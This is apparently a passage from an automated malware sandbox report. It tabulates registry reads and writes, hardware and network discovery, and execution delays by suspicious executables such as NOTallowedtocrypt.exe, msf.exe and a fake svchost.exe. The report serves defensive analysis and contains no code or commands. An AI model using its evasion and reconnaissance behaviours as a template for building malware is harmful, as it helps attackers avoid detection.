| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\choice.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\StUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\StUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\NOTallowedtocrypt.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\qNVQKFyM.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\temp_16933.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\7777.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\TCP.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\q1wnx5ir.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files\ProcessMonitor\Procmon.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\msf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\Fast%20Download.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\key.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\pfntjejghjsdkr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\temp_16933.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\7777.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\alexshlu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\S%D0%B5tu%D1%80111.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\temp_16933.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\sommnx\bmxe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\TPB-1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\werfault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\werfault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Desktop\Files\S%D0%B5tu%D1%80111.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\werfault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\werfault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\werfault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\EnterpriseMode\MSEdgePath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main\EnterpriseMode | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\Explorer.EXE | N/A |
